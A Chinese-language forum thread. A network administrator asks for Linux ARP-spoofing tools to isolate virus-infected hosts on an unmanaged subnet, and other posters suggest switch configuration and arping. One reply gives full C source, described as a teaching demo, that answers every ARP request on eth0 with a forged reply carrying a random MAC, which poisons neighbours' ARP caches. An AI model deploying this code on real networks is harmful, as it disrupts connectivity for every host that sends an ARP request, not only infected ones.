谁用过linux下搞arp欺骗或扰乱的软件?我用来抑制病毒...

双眼皮的猪

原来如此
谢谢指点..
我是都用的一种网络设备,嵌入式的linux,这个跟普通PC的还是有点不同,
有ip_dst_cache overflow的问题...

我不是搞网络的，了解一点，所以不懂,还请多多指点...

双眼皮的猪

我这里是一个掩码为22的子网..
所以...没有用到vlan ...

Thank you...

網中人

嗯? 不是用 switch 設一下就好了嗎?
只要你抓得到 MAC , 然後設一設.

這與 linux 無關, 看一下 switch 的手冊吧.
要不然, 拔掉網線總行了吧?  ^_^

双眼皮的猪

switch是最简单的那种...没有管理功能的...
而且是个掩码为22的网段...
底下怎么接上来我是不用管的...
但是如果某个口有病毒，就拔掉该网口的网线,会导致通过该口连上来的所有机器都不通,而我要做的是单独对染毒的机器做控制...

按普通的交换机拔网线或控制的做法，感觉是杀一儆百，对其他人不公平哦...

需要的就是对染毒的mac地址
1 在网关上不允许其forward或input
2 在内网也就是lan内部让它不能与其他机器通信,这样其他未染毒的机器不会受到连坐之苦...

这才是我的目的...

谢谢netman

双眼皮的猪

谢谢，我试一下

我这里man arping第一句就是request:

1. arping - send ARP REQUEST to a neighbour host

复制代码

我的AS3里没有-S这个选项...
跑到arping的主页上去找,下载下来编译,as3又没有libnet,昏死咯...

JohnBull

真巧，为了给学生演示写了一个，你试试：

1. 
   
2. #include <fcntl.h>;
   
3. #include <sys/socket.h>;
   
4. #include <sys/types.h>;
   
5. #include <features.h>;
   
6. #include <netpacket/packet.h>;
   
7. #include <net/ethernet.h>;
   
8. #include <sys/ioctl.h>;
   
9. #include <net/if.h>;
   
10. #include <net/if_arp.h>;
    
11. 
    
12. struct ether_hdr {
    
13.         unsigned char dst_mac[6];
    
14.         unsigned char src_mac[6];
    
15.         unsigned short int frm_type;
    
16. };
    
17. 
    
18. struct etherarp {
    
19.         struct ether_hdr eth_hdr;
    
20.         struct arphdr arp_hdr;
    
21.         unsigned char ar_sha[6];   /* Sender hardware address.  */
    
22.         unsigned char ar_sip[4];          /* Sender IP address.  */
    
23.         unsigned char ar_tha[6];   /* Target hardware address.  */
    
24.         unsigned char ar_tip[4];          /* Target IP address.  */
    
25. };
    
26. 
    
27. main()
    
28. {
    
29.         int sd;
    
30.         struct sockaddr_ll myend,hisend;
    
31.         int l_hisend;
    
32.         struct ifreq req;
    
33.         int ifx;
    
34.         int res;
    
35.         int i;
    
36. 
    
37.         unsigned char fake[6];
    
38. 
    
39.         struct etherarp buf[1],sbuf[1];
    
40. 
    
41.         sd=socket(PF_PACKET,SOCK_RAW,0);
    
42.         if (sd==-1) {
    
43.                 perror("socket");
    
44.                 exit(1);
    
45.         }
    
46. 
    
47.         strncpy(req.ifr_name,"eth0",IFNAMSIZ);
    
48.         ioctl(sd,SIOCGIFINDEX,&req);
    
49. 
    
50.         myend.sll_family=AF_PACKET;
    
51.         myend.sll_ifindex=req.ifr_ifindex;
    
52.         myend.sll_protocol=htons(0x0806);
    
53. 
    
54.         res=bind(sd,(struct sockaddr*)&myend,sizeof(myend));
    
55.         if (res==-1) {
    
56.                 perror("bind");
    
57.                 exit(1);
    
58.         }
    
59. 
    
60.         int fd;
    
61. 
    
62.         fd=open("/dev/urandom",O_RDONLY);
    
63. 
    
64.         while (1) {
    
65.                 res=recvfrom(sd,buf,2048,0,(struct sockaddr*)&hisend,&l_hisend);
    
66.                 if (res==0) {
    
67.                         perror("recvfrom");
    
68.                         continue;
    
69.                 }
    
70.                 read(fd,fake,6);
    
71.                 for (i=0;i<4;i++) {
    
72.                         printf("%u ",buf->;ar_tip[i]);
    
73.                 }
    
74.                 for (i=0;i<6;i++) {
    
75.                         printf("%2x ",buf->;eth_hdr.src_mac[i]);
    
76.                 }
    
77. 
    
78.                 memcpy(sbuf->;ar_sha,fake,6);
    
79.                 memcpy(sbuf->;ar_sip,buf->;ar_tip,4);
    
80.                 memcpy(sbuf->;ar_tha,buf->;ar_sha,6);
    
81.                 memcpy(sbuf->;ar_tip,buf->;ar_sip,4);
    
82.                 sbuf->;arp_hdr.ar_op=htons(ARPOP_REPLY);
    
83.                 sbuf->;arp_hdr.ar_hrd=htons(ARPHRD_ETHER);
    
84.                 sbuf->;arp_hdr.ar_hln=6;
    
85.                 sbuf->;arp_hdr.ar_pro=htons(0x0800);
    
86.                 sbuf->;arp_hdr.ar_pln=4;
    
87.                 memcpy(sbuf->;eth_hdr.dst_mac,buf->;eth_hdr.src_mac,6);
    
88.                 memcpy(sbuf->;eth_hdr.src_mac,fake,6);
    
89.                 sbuf->;eth_hdr.frm_type=htons(0x0806);
    
90. 
    
91.                 sendto(sd,sbuf,sizeof(*sbuf),0,(struct sockaddr*)&hisend,sizeof(hisend));
    
92. 
    
93.                 printf("\n");
    
94. 
    
95.                
    
96.         }
    
97.         close(fd);
    
98.         close(sd);
    
99. }
    

复制代码